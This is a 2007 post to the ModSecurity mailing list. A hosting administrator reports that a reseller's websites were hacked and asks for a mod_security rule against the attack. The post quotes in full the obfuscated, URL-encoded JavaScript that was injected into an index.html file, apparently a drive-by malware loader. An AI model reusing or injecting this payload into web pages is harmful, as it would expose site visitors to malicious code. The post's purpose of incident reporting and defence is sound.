[Modsecurity] Some type of file injection vuln going around
admin at efastservers.com
admin at efastservers.com
Mon Oct 8 12:48:33 EDT 2007
One of my resellers contacted me today stating that one of his websites was
hacked and possibly the server. He wanted to know what we were going to do
about it.
I checked the server but no other website is affected except for two of his
own websites.
There seems to be some type of javascript file injection vuln going around.
I searched the logs but could not find anything obvious in his logs. I
checked all sites and they are clean.
Here is what was injected into his index.html file after the <header> tag.
</html>
<!--[z0s]--><script>do
cument.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7Bfunction%20Qg%28gx%29
%7Breturn%20gx%7Dtry%7Bfunction%20UNc%28IDB%29%7Br
eturn%20parseInt%28IDB%29%7Dvar%20zmW%3D%27aavalvaLvahvaSvanvagvaIva9vaRvaMv
aivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaN
vakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8v
aKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvlj
vlovl7vlVvlJvlOvlbvlHvlmvlw%27%3Bvar%20uNq%3DQg%28%27v%27%29%2CHCR%3DArray%2
827751%5E27867%2CUNc%28%27243%27%29%2CUNc%28%27227
%27%29%2CUNc%28%27242%27%29%2CUNc%28%27233%27%29%2C9751%5E9959%2CUNc%28%2724
4%27%29%2CUNc%28%27190%27%29%2CUNc%28%27230%27%29%
2CUNc%28%27245%27%29%2C10675%5E10589%2C936%5E839%2C21887%5E21983%2CUNc%28%27
210%27%29%2C21801%5E22001%2C21825%5E21993%2C5220%5
E5301%2CUNc%28%27201%27%29%2C22845%5E22929%2CUNc%28%27202%27%29%2C16044%5E15
945%2CUNc%28%27169%27%29%2CUNc%28%27251%27%29%2C10
351%5E10393%2CUNc%28%27225%27%29%2CUNc%28%27204%27%29%2C10454%5E10245%2CUNc%
28%27189%27%29%2CUNc%28%27247%27%29%2C4863%5E4667%
2C29566%5E29637%2CUNc%28%27206%27%29%2CUNc%28%27226%27%29%2C15905%5E16015%2C
32317%5E32489%2C618%5E647%2C32760%5E32543%2CUNc%28
%27171%27%29%2CUNc%28%27184%27%29%2CUNc%28%27182%27%29%2C20297%5E20477%2CUNc
%28%27176%27%29%2CUNc%28%27228%27%29%2CUNc%28%2723
5%27%29%2CUNc%28%27162%27%29%2CUNc%28%27248%27%29%2CUNc%28%27199%27%29%2CUNc
%28%27205%27%29%2CUNc%28%27253%27%29%2CUNc%28%2719
5%27%29%2C30514%5E30613%2CUNc%28%27177%27%29%2CUNc%28%27250%27%29%2C15088%5E
14857%2CUNc%28%27213%27%29%2CUNc%28%27236%27%29%2C
UNc%28%27197%27%29%2CUNc%28%27175%27%29%2CUNc%28%27232%27%29%2CUNc%28%27207%
27%29%2CUNc%28%27173%27%29%2CUNc%28%27186%27%29%2C
UNc%28%27161%27%29%2C9002%5E9109%2C2844%5E3015%2C11165%5E11075%2C31322%5E314
59%2C7836%5E7745%2CUNc%28%27220%27%29%2CUNc%28%271
93%27%29%2C3893%5E3975%2C20421%5E20231%2CUNc%28%27138%27%29%2CUNc%28%27217%2
7%29%2C24184%5E24243%2CUNc%28%27179%27%29%2CUNc%28
%27181%27%29%2CUNc%28%27183%27%29%2C6089%5E5987%29%3Bvar%20CVS%2ClXs%3Bvar%2
0QVT%2CMKq%3D%27aaalaLahaSanagaIa9aRaMaLagaSaiaMax
aCadajaoa7aVaJaOabaHaxamawahaxaeaWaNaMaOakaxazawagaOajaba6amawahaxaxaYataNax
aMaOakaxazawagaOajaba6axaYataXalaOagaPaSaUaOajaeaW
aXapaOagaPaSaUaOajabaFa3aBayaqaqaqaqaqaba6axafaiaLaRaUaOaMagaXaLaiaiaraSaOax
aNaxaoa7aFaZaNaZaFaOalaLawanaOajaJaOabaFaZa6aOacan
aSahaOalaNaZaFaYataXagaiaDaTaPaWagahaSaMapajaba6axaGamawahaxaRa5aNasala4a9a5
a8asaVaWaKaNasa4asa6amawahaxadlaaNasaRanafawagaOa4
aXaLllawalalaSaLagaOllaXaiahapasaVaOlLaNaslhlSagaUlllhasa6aSa9ajafaiaLaRaUaO
aMagaXaLaiaiaraSaOaXaSaMafaOaclna9ajaRa5aFasaNasaF
aWaKabaxaNaNlga4abaHamawahaxaflllSaNafaiaLaRaUaOaMagaXllaiaLawagaSaiaMaXlSai
alaga6amawahaxlSaraNaxaslSagasaFasaganlIasaFaslhlh
asaFajaxaflllSaxl9aNaxasaslRasaslIaWlaajababaxaFaxaflllSaXahaOanllawaLaOaxaj
lhlMliawlga8aqlglxaXlglClhaVasaXasabaXahaOanllawaL
aOaxajlhldaXaFlhaVasaXasabaFasaXasaFaWlaajabaxaFasaXasaxaFaxadlaaFaOlLa6amaw
ahaxaDaRaNafaiaLaRaUaOaMagaXaLahaOawagaOlLllaOaUaO
aMagajasaSa9ahawaUaOasaba6aDaRaXalaOagljagagahaSataRagaOaxajasalahaLasaVaxlS
araba6aDaRaXlSaOaSaplSagaNa4a6aDaRaXakaSafaglSaNlo
a6aDaRaXa9ahawaUaOl7aiahafaOahaxaNaxaqa6axagahaKaHaxafaiaLaRaUaOaMagaXataiaf
aKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6axaCadajaR
a5aVaxaWaKaxaba6aGaxaLawagaLlSajaOabaxaHafaiaLaRaUaOaMagaXakahaSagaOaxajasaa
lSagaUllaIaaataiafaKaIaalhataiafaKaIaalhlSagaUllaI
asaba6axafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6aCad
axajaxaRa5aVaWaKabaxa6aGaxaGlVa9aRaMaLagaSaiaMaxaW
laajabaHaxamawahaxlJlOaNloayaVamaoaNaZaqa4lolbaylHaBlma3lxaqawataLafaOa9aZa6
amawahaxafazaNaZaZa6axa9aiahajatagaNaqa6axatagaxaa
axlJlOa6axatagaFaFabaxafazaFaNaxamaoaXalaRatalagahajaTawaglSaXa9llaiaiahajaT
awaglSaXahawaMafaiaUajablwamaoaXllaOaMapaglSabaVa4
aVa4aba6axahaOagaRahaMaxafaza6axaGaalhalaLahaSanagaI%27%3Bvar%20Hui%3DString
%28%29%3BzmW%3DzmW.split%28uNq%29%3Bfor%20%28CVS%3
D0%3BCVS%3CMKq.length%3BCVS+%3D2%29%7BQVT%3DMKq.substr%28CVS%2C2%29%3Bfor%28
lXs%3D0%3BlXs%3CzmW.length%3BlXs++%29%7Bif%28zmW%5
BlXs%5D%3D%3DQVT%29break%3B%7DHui+%3DString.fromCharCode%28HCR%5BlXs%5D%5E12
8%29%3B%7Ddocument.write%28Hui%29%3B%7Dcatch%28VMj
%29%7B%7D%7Dvar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]-->
There is a small discussion about this at
http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70
e4d5/26405b950d361a23
Is there a mod_sec rule that can stop this?
Thanks
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.gotroot.com/pipermail/modsecurity/attachments/20071008/1741261e/attachment.html
More information about the Modsecurity
mailing list